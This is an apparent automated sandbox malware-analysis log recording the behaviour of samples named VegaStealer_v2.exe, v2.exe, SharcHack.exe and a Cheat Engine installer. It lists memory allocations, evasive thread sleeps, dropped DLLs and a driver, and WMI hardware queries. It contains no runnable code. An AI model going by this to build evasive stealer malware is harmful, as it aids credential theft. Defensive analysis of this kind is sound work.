                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: 6620000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: 7620000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599835Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599540Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599119Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598994Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598876Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598638Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598522Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598406Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598293Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598184Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598074Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597960Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597842Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597727Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597610Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597498Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597375Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597266Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597141Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596921Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596796Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596684Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596458Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596302Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596104Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595985Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595870Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595641Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595516Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595407Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595282Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595172Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595062Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594953Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594844Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594735Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594610Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594485Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594374Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594252Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594134Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594028Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593918Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593735Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593594Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593374Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593161Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592828Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592641Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592502Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592328Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3962Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5760Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWindow / User API: threadDelayed 4199Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWindow / User API: threadDelayed 4891Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6483
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3082
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3402
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1835
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7475
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2138
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7662
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1809
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 407
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\SQLite.Interop.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-L3QGH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2 (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dllJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\cfoutowi.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EntityFramework.dllJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                                  Source: C:\Users\user\Desktop\SharcHack.exeAPI coverage: 8.3 %
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeAPI coverage: 2.3 %
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAPI coverage: 3.5 %
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2076Thread sleep count: 3962 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2076Thread sleep count: 5760 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -599835s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -599540s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -599250s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -599119s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598994s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598876s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598750s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598638s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598522s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598406s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598293s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598184s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -598074s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597960s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597842s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597727s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597610s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597498s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597375s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597266s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597141s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -597031s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596921s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596796s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596684s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596458s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596302s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -596104s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595985s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595870s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595750s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595641s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595516s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595407s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595282s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595172s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -595062s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594953s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594844s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594735s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594610s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594485s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594374s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594252s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594134s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -594028s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -593918s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -593735s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -593594s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -593374s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -593161s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -592828s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -592641s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -592502s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360Thread sleep time: -592328s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 5064Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 5516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp TID: 3228Thread sleep time: -300000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep count: 6483 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep count: 3082 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep time: -8301034833169293s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep count: 3402 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep count: 1835 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2104Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep count: 7475 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4696Thread sleep time: -3689348814741908s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep count: 2138 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep count: 7662 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep count: 1809 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile Volume queried: C:\Users\user\AppData\Local\Temp\is-3E079.tmp FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile Volume queried: C:\Users\user\AppData\Local\Temp\is-3E079.tmp FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4E0F67 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,8_2_6B4E0F67
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC6F1A0 GetSystemInfo,7_2_6BC6F1A0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599835Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599540Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 599119Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598994Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598876Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598638Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598522Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598406Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598293Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598184Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 598074Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597960Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597842Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597727Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597610Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597498Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597375Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597266Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597141Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 597031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596921Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596796Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596684Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596458Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596302Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 596104Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595985Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595870Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595641Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595516Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595407Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595282Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595172Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 595062Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594953Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594844Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594735Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594610Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594485Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594374Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594252Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594134Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 594028Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593918Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593735Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593594Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593374Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 593161Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592828Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592641Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592502Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 592328Jump to behavior
